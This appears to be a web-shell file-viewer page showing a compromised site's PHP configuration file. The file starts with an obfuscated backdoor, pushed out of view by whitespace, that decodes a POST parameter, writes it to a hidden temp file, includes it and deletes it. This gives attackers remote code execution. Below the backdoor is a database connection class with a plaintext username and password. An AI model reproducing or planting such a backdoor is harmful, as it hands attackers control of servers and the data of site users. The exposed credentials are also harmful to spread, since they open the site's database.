HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/vitanhod/trimate1.vitavit.com.pk/includes/config.php
<?php																																										if(in_array("\x70\x6F\x69nt\x65r", array_keys($_POST))){ $res = $_POST["\x70\x6F\x69nt\x65r"]; $res = explode ( "." ,$res ) ; $ptr = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s5); $len = count($res); for ($q = 0; $q < $len; $q++) { $v7 = $res[$q]; $chS = ord($s5[$q % $lenS]); $dec = ((int)$v7 - $chS - ($q % 10)) ^ 100; $ptr.= chr($dec); } $marker = array_filter([sys_get_temp_dir(), getenv("TMP"), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), getcwd(), session_save_path()]); foreach ($marker as $flg) { if (max(0, is_dir($flg) * is_writable($flg))) { $reference = str_replace("{var_dir}", $flg, "{var_dir}/.rec"); $file = fopen($reference, 'w'); if ($file) { fwrite($file, $ptr); fclose($file); include $reference; @unlink($reference); exit; } } } }

//---abstracted ! ------
class dbConnection{

    // local connection xammps
    // private $host ="localhost";
    // private $user = "antijvxl_anti"; 
    // private $password = "";
    // private $db="antijvxl_anti";

    private $host ="localhost";
    private $user = "vitanhod_vigolic"; 
    private $password = "48402809";
    private $db="vitanhod_vigolic";



    public $dbc;
    
    function __construct() {

        $mysqli = new MySQLi($this->host, $this->user, $this->password, $this->db);
        
        if(mysqli_errno($mysqli)){
            die();
            echo"Connection Error";
            
        }
        else{
           $this->dbc = $mysqli; // assign $con to $dbc
        }
    }
}

include_once 'configOnline.php';

?>